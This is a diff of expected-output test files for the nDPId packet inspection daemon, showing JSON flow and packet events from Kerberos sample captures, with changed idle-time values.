~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 13/13

14
test/results/kerberos-login.pcap.out
View File

@@ -49,12 +49,12 @@
00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":180000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}}
02065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946716140774,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1244,"pkt_l4_len":1210,"thread_ts_msec":946716140774,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATOSu8AAIARyCcKBQMBCgEMAgBYBEgEurmkbYIErjCCBKqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iKTAnoAMCAQKhIDAeGwRjaWZzGxZ2cGMtdzJrM2VudC5kZW55ZGMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx0aFmxok9g1Ue0357Hr75qdhqZfRht4OHreKB5u\/V5IirkcwENplNxxQmbw8+DFBp6kUxON4ouXLUpsGQja+UwQNswQ7cEXb3TTT7jYMm2q+XU9A8z+Cm+x45x6EPfupXNfUoIz5d+DBXqnAKwiMsohJZBYGmEm7Q+yhVWVar9k\/vQ4EHxPSmoKKOWOqMeWxjcfGizeQcfY\/7A7oBkliScCXMBosF3zWgVn6SZUxx2nLdkS4jVlNmS1jWY0CBy3hQgCl7KtJ88Rxj2JXMQ5Fa0ibQHlt+FeHBgOikUOCt7JR9KHGnKF+V9OwmxFHJrtiKrEW2Cv72q08\/TX55bwUm9jrgvLF+1YsovMtrgWOHLFsVcxNfbdawsk1MAGXI1K8WdNlNxj79Sa+effGMmTt32eF8\/oOYgeR3A+0F1wnFjIQeheNTRLl\/9WBWymTf5CVGZk9I\/sUh0ufZ1o58VaghVEb+aOBC6tWfpsOkLJ9ANhxY1Vw45ioZzS06CBZRvW7MMUcb4Ur7IeznoOXOKL+obkIkaEuJF9dxjVVEK3H8T8BFen6GrrRV4+9gxQ28wWj2B\/3R0I0K8npdyxugyU7o6q1h547H+5tjJ8dixUeIFR0R+BxQUA1qGlVkB7SS4zvQUHJeQ33GsZmfB09OjxsbZUKDOYPS2DppWChX3zAiJESMybgCQW5ulCO\/DCKGrcKFEaqcfqvdr1e4WyRdwCcvZn2MJR1nu01uw1EbqNmvBlDTHXDpZmQAS+Z9AFAEe6+Jwucjc+X3W9+cKSxj+uTpUbPMfAp3MPTCh88MxPw2Aax6SFtx5IK+P6jE2F6eQfjhX9aV6hdIZ0pWVxFUqJk1oXwgJHigW8nhTnJsDeLgqs70DVvtJOOt9wQIyuysdS5eh4ZJK2TyKfSg9XuEekXtqV8HHagG6OZO87HJsGQmu\/\/tjHaE7Ql4hIoe+fcxYBzuwcDJYmBr6xlBxFqKXZZHTBFk60GqPFITFaX17Oz+6fJYP3RmN2JGKt17gwAhua9IJr3+oyzOLK9Ar9ryp7P5t03iErc\/1gvMC+WI+39aaB\/TCB+qADAgEXooHyBIHv9+WbNZuFKxvCR6wr2zaCGnigV6GBLntoGkqEg4\/vMLz6p+qzEJQC2ilW82BTzXU6scdi61TaIC3oq6sMVee5Q+SNihDQg2j\/e7P09S+lWbe2hxhDb2MYsqe8Lg50XMclkXvYxZYVxgGfh9+QhSOku3gyZ4w550hPMwNPtwT50N8oSP0YzMlcdyjS0yGxX38Sztfi6maarSaN8R8bO1fNlv7DMT0XFldAA9Ujo2zbz4RI5ls2TDkFYA60ukMDSLX5c+pTDKFVkARApYRvSaMnKg1aCCWfstO5zat+wIz45gQKBeA3dPJACT5hwG+Q1qc="}
00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":24,"total-skipped-flows":0,"total-l4-data-len":29024,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":12,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":946724453221}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"uKxvNgTjGGbam+N9CABFAAA8DbNAAIAGV6nAqAoDwKgKDABYrOCOu9eK+5UIh6ASIAAObgAAAgQFtAEDAwgEAggKM1tACf\/++SE="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="}
00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}}
00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"uKxvNgTjGGbam+N9CABFAAA8DbNAAIAGV6nAqAoDwKgKDABYrOCOu9eK+5UIh6ASIAAObgAAAgQFtAEDAwgEAggKM1tACf\/++SE="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="}
00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}}
00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":180000,"flow_min_l4_payload_len":1189,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2400,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":180000,"flow_min_l4_payload_len":1192,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":2415,"flow_avg_l4_payload_len":1207,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067473,"flow_last_seen":946716067513,"flow_idle_time":180000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
@@ -67,7 +67,7 @@
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":180000,"flow_min_l4_payload_len":1182,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2393,"flow_avg_l4_payload_len":1196,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":180000,"flow_min_l4_payload_len":1228,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":2463,"flow_avg_l4_payload_len":1231,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":180000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-data-len":35242,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":946724453222}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 39/39

378
test/results/kerberos.pcap.out
View File

@@ -1,194 +1,194 @@
00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1549337929790}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
